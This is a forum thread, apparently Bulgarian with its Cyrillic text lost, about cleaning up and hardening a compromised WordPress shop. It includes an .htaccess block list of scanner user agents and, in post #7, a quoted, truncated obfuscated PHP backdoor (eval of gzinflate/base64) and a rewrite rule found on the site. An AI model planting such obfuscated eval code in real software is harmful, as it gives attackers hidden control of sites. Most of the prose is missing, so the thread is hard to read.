Thread: Wordpress

  1. #1
    the system controls you MegatroniC's Avatar
    Join Date: Jun:2005
    Location:
    Posts: 3,566

    Wordpress

    , - - .

    , woocommerce. , , wordpress. 4.6.7. , - 4.7.2, .
    , , , (4.8.1) ..., .

    , , ( ). , (), , . , - 12 . , ( ), . .
    , brute force /xmlrpc.php /wp-login.php

    . .

    , , .
    , , .
    ...

  2. #2
    Registered User tedych's Avatar
    Join Date: Nov:2003
    Location:
    Posts: 17,654
    wordpress, '', -! global , "" "" , () ..., 5-6 .
    .

    (. ) login, 5 . ....
    , login, ( 12 )?

  3. #3
    geek skrubalov's Avatar
    Join Date: Jan:2009
    Location:
    Posts: 769
    , . phpmail WP.
    6-7 .
    :
    .htaccess

    ( https://www.smashingmagazine.com/201...ns-ownerships/ )

    !

    - - .

  4. #4
    the system controls you MegatroniC's Avatar
    Join Date: Jun:2005
    Location:
    Posts: 3,566
    1- .
    cPanel .
    , /xmlrpc.php /wp-login.php.

    .
    - Wordpress
    - Wordpress.
    readme.html, license.txt, wp-config-sample.php
    - Login Lockdown 5 IP, 5 .
    180 .
    - "honeypot" () , .
    - 404
    - Trace Track
    - 6G/5G blacklist
    -
    - -
    - wp-config.php wordpress
    - wp-config.php public-html,
    - wp-admin.php e .htaccess IP
    - .htaccess public-html Script Injections, xmlrpc.php

    - ,

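    # Flag requests by User-Agent (case-insensitive) with the keep_out variable
    <IfModule mod_setenvif.c>
    # Empty User-Agent header
    SetEnvIfNoCase User-Agent ^$ keep_out
    # Known scanner, scraper and library User-Agent substrings
    SetEnvIfNoCase User-Agent (casper|cmsworldmap|diavol|dotbot) keep_out
    SetEnvIfNoCase User-Agent (flicky|ia_archiver|jakarta|kmccrew) keep_out
    SetEnvIfNoCase User-Agent (purebot|comodo|feedfinder|planetwork) keep_out
    SetEnvIfNoCase User-Agent (libwww|planetwork|pycurl|skygrid) keep_out
    SetEnvIfNoCase User-Agent (purebot|comodo|feedfinder|turnit) keep_out
    SetEnvIfNoCase User-Agent (zmeu|nutch|vikspider|binlar|sucker) keep_out
    # Deny flagged requests; applies only to the GET, POST and PUT methods.
    # Order/Allow/Deny is Apache 2.2 syntax; Apache 2.4 needs mod_access_compat for it.
    <Limit GET POST PUT>
    Order Allow,Deny
    Allow from all
    Deny from env=keep_out
    </Limit>
    </IfModule>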
    - , ,

    , 26 .
    wordpress (/wp-login), admin.
    Brute Force /wp-login.php admin , , .
    , . ip- .
    , , .
    .

    , wordpress , . , .


    phpmail WP.
    ?



    Name                 File/Folder                      Current Permissions  Recommended Permissions
    root directory       /public_html/                    0755                 0755                     No Action Required
    wp-includes/         /public_html/wp-includes         0755                 0755                     No Action Required
    .htaccess            /public_html/.htaccess           0644                 0644                     No Action Required
    wp-admin/index.php   /public_html/wp-admin/index.php  0644                 0644                     No Action Required
    wp-admin/js/         /public_html/wp-admin/js/        0755                 0755                     No Action Required
    wp-content/themes/   /public_html/wp-content/themes   0755                 0755                     No Action Required
    wp-content/plugins/  /public_html/wp-content/plugins  0755                 0755                     No Action Required
    wp-admin/            /public_html/wp-admin            0755                 0755                     No Action Required
    wp-content/          /public_html/wp-content          0755                 0755                     No Action Required
    wp-config.php        /wp-config.php                   0644                 0644                     No Action Required
    Last edited by MegatroniC; 7th August 2017 at 13:11.
    , , .
    ...

  5. #5
    Registered User tedych's Avatar
    Join Date: Nov:2003
    Location:
    Posts: 17,654
    .
    , , FTP , mysql , / ( ) .

  6. #6
    Registered User rumenchooo's Avatar
    Join Date: Nov:2008
    Location: HOME
    Posts: 239
    detectify

    .

    /xmlrpc.php webserver-a (403 Forbidden) ( )

    wp-login.php Rename wp-login.php .

    wp-login.php (90 % )
    Last edited by rumenchooo; 7th August 2017 at 15:00.

  7. #7
    geek skrubalov's Avatar
    Join Date: Jan:2009
    Location:
    Posts: 769
    1. . ( 3:34 , , )
    2. htaccess " RewriteRule ^([a-zA-Z0-9]+)-(.*)-([0-9]+)\.jpds$ new.php?$1=$2-$3 [L] " ??
    3. "eval(gzinflate(base64_decode(' " ( " <?php
    @error_reporting(0);
    @set_time_limit(0);
    eval(gzinflate(base64_decode('5b1rV9vIEi j6OXut/R86Gu+RPTHGNkkmMZhACCQQAhmeeZDjkW3ZVpAtj SRjSIb/fqqqH2q9jElm77PuumQF7O7q6upXdXV1dVXJmkaj jm+F4cwL+qzNDGP13/8q9TzXC/DbL/3BE0rp2wNr6kYdqxc53gSyzB3HtcN31sTUs6eh3b G+WtcAEAVTW8/qjawgtCMseu5M+t4sXGo0nzSw+L//5QzKD+2xH92US53j7aOz7aPP5puTk/edU/jW2Xy9fXBifqlU2Pd//4vBTwnqCTaH9iQKAZ8VBNZN2XjteUPXNqrMOHang Y8f3h0fvPQi/ORYHSvojZwrO8CvH61J377GT0fWuOtCYmWVowZK/MAedsZW1BuVzWWT1Zgz9l2vb5fNv82qXncF8sxlB xMXoRp/RrbVt4MygS03anX2uP6YHXgR2/Gmk74pqcAf+9qJxNfbf//rFrtpI7TDEPq/E0ZWEJUResOZOB3o17JpB4EXdFxvaFYPTvf3k5mQ 3CGA0KzWk1lj67pjX9u9KY5sJ3LGtgSBb... "

    , 15 2016 17 2017 ( ). .

    :
    1. ? , , .. ?
    - - .

  8. #8
    the system controls you MegatroniC's Avatar
    Join Date: Jun:2005
    Location:
    Posts: 3,566
    @ skrubalov, , cPanel-a . . .. , .

    htaccess , - , .


    3. "eval(gzinflate(base64_decode('
    , , php .

    :
    1. ? , , .. ?
    .



    Quote Originally Posted by tedych View Post
    .
    , , FTP , mysql , / ( ) .
    , , .
    , .
    , ...

    Quote Originally Posted by rumenchooo View Post
    . .

    Quote Originally Posted by rumenchooo View Post
    /xmlrpc.php webserver-a (403 Forbidden) ( )
    wp-login.php Rename wp-login.php .
    wp-login.php (90 % )
    .




    :

    ip: 46.119.112.177
    : - /products/ /
    : 8/7/17, 3:06 PM
    : 1139
    URL : chatr0ulette.v1de0/ ( , )

    , public_html, /9288
    , ip- .

    . , .
    , , .
    ...
